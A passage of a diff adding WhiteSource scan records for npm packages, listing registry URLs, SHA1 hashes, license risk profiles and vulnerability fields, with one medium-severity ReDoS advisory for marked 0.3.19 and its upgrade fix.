"lcid-2.0.0.tgz", + "artifactId": "lcid-2.0.0.tgz", + "version": "2.0.0", + "groupId": "lcid", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/75b7263a-b769-4d66-8a1b-5e877d3af09e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "066aae08-0ccb-4849-997d-f3f86f7e273e", + "keyId": 27272746, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/compression/-/compression-1.7.4.tgz", + "homePage": "https://github.com/expressjs/compression#readme", + "genericPackageIndex": "https://www.npmjs.org/package/compression" + }, + "matchType": "SHA1", + "sha1": "95523eff170ca57c29a0ca41e6fe131f41e5bb8f", + "name": "compression-1.7.4.tgz", + "artifactId": "compression-1.7.4.tgz", + "version": "1.7.4", + "groupId": "compression", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/64154403-e74a-4cf2-8d1a-0438b873183d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6eda8618-b771-47d5-9bc6-191663a9972d", + "keyId": 28280523, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/pnp-webpack-plugin/-/pnp-webpack-plugin-1.5.0.tgz", + "homePage": "https://github.com/arcanis/pnp-webpack-plugin", + "genericPackageIndex": "https://www.npmjs.org/package/pnp-webpack-plugin" + }, + "matchType": "SHA1", + "sha1": "62a1cd3068f46d564bb33c56eb250e4d586676eb", + "name": "pnp-webpack-plugin-1.5.0.tgz", + "artifactId": "pnp-webpack-plugin-1.5.0.tgz", + "version": "1.5.0", + "groupId": "pnp-webpack-plugin", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ab0c0fa8-2208-4e51-be8e-4068868c6691" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8050c3de-5850-495e-831f-11e858b9468a", + "keyId": 27089967, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-11.1.1.tgz", + "homePage": "https://github.com/yargs/yargs-parser#readme", + "genericPackageIndex": "https://www.npmjs.org/package/yargs-parser" + }, + "matchType": "SHA1", + "sha1": "879a0865973bca9f6bab5cbdf3b1c67ec7d3bcf4", + "name": "yargs-parser-11.1.1.tgz", + "artifactId": "yargs-parser-11.1.1.tgz", + "version": "11.1.1", + "groupId": "yargs-parser", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/yargs-parser/v/11.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5eaa7ada-8935-4a98-aa32-8be21a1f3270", + "keyId": 27100286, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-font-variant/-/postcss-font-variant-4.0.0.tgz", + "homePage": "https://github.com/postcss/postcss-font-variant#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-font-variant" + }, + "matchType": "SHA1", + "sha1": "71dd3c6c10a0d846c5eda07803439617bbbabacc", + "name": "postcss-font-variant-4.0.0.tgz", + "artifactId": "postcss-font-variant-4.0.0.tgz", + "version": "4.0.0", + "groupId": "postcss-font-variant", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2eaeb186-cad6-4104-87ee-17749ed18168" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5128bb8c-1505-4329-9b46-62a491ee7a12", + "keyId": 27100472, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-focus-visible/-/postcss-focus-visible-4.0.0.tgz", + "homePage": "https://github.com/jonathantneal/postcss-focus-visible#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-focus-visible" + }, + "matchType": "SHA1", + "sha1": "477d107113ade6024b14128317ade2bd1e17046e", + "name": "postcss-focus-visible-4.0.0.tgz", + "artifactId": "postcss-focus-visible-4.0.0.tgz", + "version": "4.0.0", + "groupId": "postcss-focus-visible", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-focus-visible/v/4.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3a3a6e82-6a30-483e-bb14-d711aeff9aea", + "keyId": 27714982, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/bfj/-/bfj-6.1.2.tgz", + "homePage": "https://gitlab.com/philbooth/bfj", + "genericPackageIndex": "https://www.npmjs.org/package/bfj" + }, + "matchType": "SHA1", + "sha1": "325c861a822bcb358a41c78a33b8e6e2086dde7f", + "name": "bfj-6.1.2.tgz", + "artifactId": "bfj-6.1.2.tgz", + "version": "6.1.2", + "groupId": "bfj", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/81536754-fa22-4008-9eb9-9e72b6a718cf" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "deca4d62-8dc3-497f-8dcc-a466e3b973ad", + "keyId": 27100412, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-gap-properties/-/postcss-gap-properties-2.0.0.tgz", + "homePage": "https://github.com/jonathantneal/postcss-gap-properties#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-gap-properties" + }, + "matchType": "SHA1", + "sha1": "431c192ab3ed96a3c3d09f2ff615960f902c1715", + "name": "postcss-gap-properties-2.0.0.tgz", + "artifactId": "postcss-gap-properties-2.0.0.tgz", + "version": "2.0.0", + "groupId": "postcss-gap-properties", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-gap-properties/v/2.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "131a47c4-c7eb-4354-b189-268ea4587d8d", + "keyId": 26955041, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/normalize-range/-/normalize-range-0.1.2.tgz", + "homePage": "https://github.com/jamestalmage/normalize-range#readme", + "genericPackageIndex": "https://www.npmjs.org/package/normalize-range" + }, + "matchType": "SHA1", + "sha1": "2d10c06bdfd312ea9777695a4d28439456b75942", + "name": "normalize-range-0.1.2.tgz", + "artifactId": "normalize-range-0.1.2.tgz", + "version": "0.1.2", + "groupId": "normalize-range", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/normalize-range/v/0.1.2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "37ba3891-7d66-4c58-988e-ea69ea9ba8d6", + "keyId": 27521625, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/webpack-hot-middleware/-/webpack-hot-middleware-2.25.0.tgz", + "homePage": "https://github.com/webpack-contrib/webpack-hot-middleware#readme", + "genericPackageIndex": "https://www.npmjs.org/package/webpack-hot-middleware" + }, + "matchType": "SHA1", + "sha1": "4528a0a63ec37f8f8ef565cf9e534d57d09fe706", + "name": "webpack-hot-middleware-2.25.0.tgz", + "artifactId": "webpack-hot-middleware-2.25.0.tgz", + "version": "2.25.0", + "groupId": "webpack-hot-middleware", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/webpack-hot-middleware" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "01ee553d-43eb-4c0a-8be7-a79192255bb0", + "keyId": 28244654, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/chownr/-/chownr-1.1.3.tgz", + "homePage": "https://github.com/isaacs/chownr#readme", + "genericPackageIndex": "https://www.npmjs.org/package/chownr" + }, + "matchType": "SHA1", + "sha1": "42d837d5239688d55f303003a508230fa6727142", + "name": "chownr-1.1.3.tgz", + "artifactId": "chownr-1.1.3.tgz", + "version": "1.1.3", + "groupId": "chownr", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/chownr/v/1.1.3" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8b157942-c19b-46f0-914b-fdcf7f99a8f5", + "keyId": 27100486, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-selector-not/-/postcss-selector-not-4.0.0.tgz", + "homePage": "https://github.com/postcss/postcss-selector-not#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-selector-not" + }, + "matchType": "SHA1", + "sha1": "c68ff7ba96527499e832724a2674d65603b645c0", + "name": "postcss-selector-not-4.0.0.tgz", + "artifactId": "postcss-selector-not-4.0.0.tgz", + "version": "4.0.0", + "groupId": "postcss-selector-not", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c7960484-208a-47e2-8590-7ae751dffe1a" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "28cbc2d3-4d2a-4039-b4a0-8458ec8e4593", + "keyId": 27287343, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/css-has-pseudo/-/css-has-pseudo-0.10.0.tgz", + "homePage": "https://github.com/csstools/css-has-pseudo#readme", + "genericPackageIndex": "https://www.npmjs.org/package/css-has-pseudo" + }, + "matchType": "SHA1", + "sha1": "3c642ab34ca242c59c41a125df9105841f6966ee", + "name": "css-has-pseudo-0.10.0.tgz", + "artifactId": "css-has-pseudo-0.10.0.tgz", + "version": "0.10.0", + "groupId": "css-has-pseudo", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/css-has-pseudo/v/0.10.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "23052374-257a-4dd7-bbb9-c2b1eaddc5f3", + "keyId": 27498786, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/mri/-/mri-1.1.4.tgz", + "homePage": "https://github.com/lukeed/mri#readme", + "genericPackageIndex": "https://www.npmjs.org/package/mri" + }, + "matchType": "SHA1", + "sha1": "7cb1dd1b9b40905f1fac053abe25b6720f44744a", + "name": "mri-1.1.4.tgz", + "artifactId": "mri-1.1.4.tgz", + "version": "1.1.4", + "groupId": "mri", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/mri/v/1.1.4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "dd25ef18-d71b-4ce1-925d-79ccc7d7da8f", + "keyId": 27377147, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-color-hex-alpha/-/postcss-color-hex-alpha-5.0.3.tgz", + "homePage": "https://github.com/postcss/postcss-color-hex-alpha#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-color-hex-alpha" + }, + "matchType": "SHA1", + "sha1": "a8d9ca4c39d497c9661e374b9c51899ef0f87388", + "name": "postcss-color-hex-alpha-5.0.3.tgz", + "artifactId": "postcss-color-hex-alpha-5.0.3.tgz", + "version": "5.0.3", + "groupId": "postcss-color-hex-alpha", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/af11637b-7c5c-49d9-9df0-9dc733660b00" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "fb2bfc91-55da-4418-918b-716af7223eb5", + "keyId": 27242082, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/logform/-/logform-2.1.2.tgz", + "homePage": "https://github.com/winstonjs/logform#readme", + "genericPackageIndex": "https://www.npmjs.org/package/logform" + }, + "matchType": "SHA1", + "sha1": "957155ebeb67a13164069825ce67ddb5bb2dd360", + "name": "logform-2.1.2.tgz", + "artifactId": "logform-2.1.2.tgz", + "version": "2.1.2", + "groupId": "logform", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/1f30f879-7717-4eb6-892e-6f85059c7a6e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4ba3c62e-c55d-4ade-b82d-d2bdddd9ca5a", + "keyId": 28050007, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/rxjs/-/rxjs-6.5.3.tgz", + "homePage": "https://github.com/ReactiveX/RxJS", + "genericPackageIndex": "https://www.npmjs.org/package/rxjs" + }, + "matchType": "SHA1", + "sha1": "510e26317f4db91a7eb1de77d9dd9ba0a4899a3a", + "name": "rxjs-6.5.3.tgz", + "artifactId": "rxjs-6.5.3.tgz", + "version": "6.5.3", + "groupId": "rxjs", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "Project home page", + "reference": "https://github.com/ReactiveX/RxJS" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "aa4f3633-3727-4486-9fc2-44059999c2a5", + "keyId": 28432158, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-popover/-/honeyui-popover-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/popover#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-popover" + }, + "matchType": "SHA1", + "sha1": "42293fdd0c0cde3d2196c75ac749ca147e2c2caa", + "name": "honeyui-popover-1.1.1.tgz", + "artifactId": "honeyui-popover-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-popover", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "86b612df-63f4-4ec4-b858-63d640dddd39", + "keyId": 27806468, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/blessed/-/blessed-0.1.81.tgz", + "homePage": "https://github.com/chjj/blessed", + "genericPackageIndex": "https://www.npmjs.org/package/blessed" + }, + "matchType": "SHA1", + "sha1": "f962d687ec2c369570ae71af843256e6d0ca1129", + "name": "blessed-0.1.81.tgz", + "artifactId": "blessed-0.1.81.tgz", + "version": "0.1.81", + "groupId": "blessed", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/blessed/v/0.1.81" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4bd38b2a-1e92-45a7-9633-d06bece8ce38", + "keyId": 27287375, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-attribute-case-insensitive/-/postcss-attribute-case-insensitive-4.0.1.tgz", + "homePage": "https://github.com/Semigradsky/postcss-attribute-case-insensitive#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-attribute-case-insensitive" + }, + "matchType": "SHA1", + "sha1": "b2a721a0d279c2f9103a36331c88981526428cc7", + "name": "postcss-attribute-case-insensitive-4.0.1.tgz", + "artifactId": "postcss-attribute-case-insensitive-4.0.1.tgz", + "version": "4.0.1", + "groupId": "postcss-attribute-case-insensitive", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/05ae4e00-47d1-4251-aa08-4a1b162d4620" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "76f6c3f4-e819-4a14-b492-7b4e9b2aacbf", + "keyId": 26955290, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/read-pkg-up/-/read-pkg-up-3.0.0.tgz", + "homePage": "https://github.com/sindresorhus/read-pkg-up#readme", + "genericPackageIndex": "https://www.npmjs.org/package/read-pkg-up" + }, + "matchType": "SHA1", + "sha1": "3ed496685dba0f8fe118d0691dc51f4a1ff96f07", + "name": "read-pkg-up-3.0.0.tgz", + "artifactId": "read-pkg-up-3.0.0.tgz", + "version": "3.0.0", + "groupId": "read-pkg-up", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/6dcd51a7-2e59-4b04-9674-ae0526320803" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "06cbcd98-4218-43bf-a77f-2da7c866d719", + "keyId": 28432197, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@sentry/types/-/types-5.7.1.tgz", + "homePage": "https://github.com/getsentry/sentry-javascript/tree/master/packages/types", + "genericPackageIndex": "https://www.npmjs.org/package/@sentry/types" + }, + "matchType": "SHA1", + "sha1": "4c4c1d4d891b6b8c2c3c7b367d306a8b1350f090", + "name": "types-5.7.1.tgz", + "artifactId": "types-5.7.1.tgz", + "version": "5.7.1", + "groupId": "@sentry/types", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@sentry/types/v/5.7.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9df3e240-081f-4df6-8a9a-2486d4257f00", + "keyId": 27478558, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/colorspace/-/colorspace-1.1.2.tgz", + "homePage": "https://github.com/3rd-Eden/colorspace", + "genericPackageIndex": "https://www.npmjs.org/package/colorspace" + }, + "matchType": "SHA1", + "sha1": "e0128950d082b86a2168580796a0aa5d6c68d8c5", + "name": "colorspace-1.1.2.tgz", + "artifactId": "colorspace-1.1.2.tgz", + "version": "1.1.2", + "groupId": "colorspace", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/colorspace/v/1.1.2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9bd089a4-86e8-432d-af9f-1a5972ac8fbe", + "keyId": 26984534, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/marked/-/marked-0.3.19.tgz", + "homePage": "https://marked.js.org", + "genericPackageIndex": "https://www.npmjs.org/package/marked" + }, + "matchType": "SHA1", + "sha1": "5d47f709c4c9fc3c216b6d46127280f40b39d790", + "name": "marked-0.3.19.tgz", + "artifactId": "marked-0.3.19.tgz", + "version": "0.3.19", + "groupId": "marked", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/marked" + } + ], + "vulnerabilities": [ + { + "name": "WS-2019-0169", + "type": "WS", + "severity": "MEDIUM", + "score": 5.0, + "publishDate": "2019-07-15", + "url": "", + "description": "marked versions \u003e0.3.14 and \u003c 0.6.2 has Regular Expression Denial of Service vulnerability Email addresses may be evaluated in quadratic time, allowing attackers to potentially crash the node process due to resource exhaustion. ", + "topFix": { + "vulnerability": "WS-2019-0169", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://www.npmjs.com/advisories/812", + "fixResolution": "Upgrade to version 0.6.2", + "date": "2019-07-15", + "message": "Upgrade to version" + }, + "allFixes": [], + "references": [] + } + ], + "customAttributeValues": [] + }, + { + "keyUuid": "073359c0-b23e-48be-9e77-23bf6ede2816", + "keyId": 26984568, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/rx-lite/-/rx-lite-4.0.8.tgz", + "homePage": "https://github.com/Reactive-Extensions/RxJS", + "genericPackageIndex": "https://www.npmjs.org/package/rx-lite" + }, + "matchType": "SHA1", + "sha1": "0b1e11af8bc44836f04a6407e92da42467b79444", + "name": "rx-lite-4.0.8.tgz", + "artifactId": "rx-lite-4.0.8.tgz", + "version": "4.0.8", + "groupId": "rx-lite", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/43d607b4-153f-4c82-a0a0-d64dfd02d86d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ee6d8698-67cb-47f6-88c3-a02cc9ca866f", + "keyId": 27079309, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cli-table3/-/cli-table3-0.5.1.tgz", + "homePage": "https://github.com/cli-table/cli-table3", + "genericPackageIndex": "https://www.npmjs.org/package/cli-table3" + }, + "matchType": "SHA1", + "sha1": "0252372d94dfc40dbd8df06005f48f31f656f202", + "name": "cli-table3-0.5.1.tgz", + "artifactId": "cli-table3-0.5.1.tgz", + "version": "0.5.1", + "groupId": "cli-table3", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/0b8d2132-d20a-4f0b-abdc-e975f75eb942" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6e885d6a-639c-41e0-8e86-de6da7bb094b", + "keyId": 27817329, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.0.tgz", + "homePage": "https://github.com/feross/safe-buffer", + "genericPackageIndex": "https://www.npmjs.org/package/safe-buffer" + }, + "matchType": "SHA1", + "sha1": "b74daec49b1148f88c64b68d49b1e815c1f2f519", + "name": "safe-buffer-5.2.0.tgz", + "artifactId": "safe-buffer-5.2.0.tgz", + "version": "5.2.0", + "groupId": "safe-buffer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/safe-buffer" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "11d64063-0654-4baf-a5e3-28f0e93247ea", + "keyId": 28432144, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/inquirer-select-directory/-/inquirer-select-directory-1.2.0.tgz", + "homePage": "https://github.com/KamiKillertO/inquirer-select-directory#readme", + "genericPackageIndex": "https://www.npmjs.org/package/inquirer-select-directory" + }, + "matchType": "SHA1", + "sha1": "a7688762e6b5c03e85a36c93a9d8e680542e896e", + "name": "inquirer-select-directory-1.2.0.tgz", + "artifactId": "inquirer-select-directory-1.2.0.tgz", + "version": "1.2.0", + "groupId": "inquirer-select-directory", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/inquirer-select-directory" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e782d786-2028-4357-a7d7-f9f7b7869546", + "keyId": 28084461, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/watchpack/-/watchpack-2.0.0-beta.5.tgz", + "homePage": "https://github.com/webpack/watchpack", + "genericPackageIndex": "https://www.npmjs.org/package/watchpack" + }, + "matchType": "SHA1", + "sha1": "c005db39570d81d9d34334870abc0f548901b880", + "name": "watchpack-2.0.0-beta.5.tgz", + "artifactId": "watchpack-2.0.0-beta.5.tgz", + "version": "2.0.0-beta.5", + "groupId": "watchpack", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + 